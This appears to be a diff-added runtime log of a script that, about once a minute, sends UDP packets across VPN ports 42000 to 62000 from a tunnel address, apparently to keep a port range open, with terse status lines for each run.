+Starting port fill at 2020-09-06 05:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 05:45:06 +Starting port fill at 2020-09-06 05:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:46:06 +Starting port fill at 2020-09-06 05:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:47:05 +Starting port fill at 2020-09-06 05:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:48:04 +Starting port fill at 2020-09-06 05:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 05:49:06 +Starting port fill at 2020-09-06 05:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:50:04 +Starting port fill at 2020-09-06 05:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:51:06 +Starting port fill at 2020-09-06 05:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:52:05 +Starting port fill at 2020-09-06 05:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:53:04 +Starting port fill at 2020-09-06 05:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:54:04 +Starting port fill at 2020-09-06 05:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:55:05 +Starting port fill at 2020-09-06 05:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:56:05 +Starting port fill at 2020-09-06 05:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:57:05 +Starting port fill at 2020-09-06 05:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:58:05 +Starting port fill at 2020-09-06 05:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 05:59:05 +Starting port fill at 2020-09-06 06:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:00:05 +Starting port fill at 2020-09-06 06:01:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:01:05 +Starting port fill at 2020-09-06 06:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:02:06 +Starting port fill at 2020-09-06 06:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:03:05 +Starting port fill at 2020-09-06 06:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:04:06 +Starting port fill at 2020-09-06 06:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:05:05 +Starting port fill at 2020-09-06 06:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:06:06 +Starting port fill at 2020-09-06 06:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:07:06 +Starting port fill at 2020-09-06 06:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:08:05 +Starting port fill at 2020-09-06 06:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 06:09:06 +Starting port fill at 2020-09-06 06:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 06:10:06 +Starting port fill at 2020-09-06 06:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 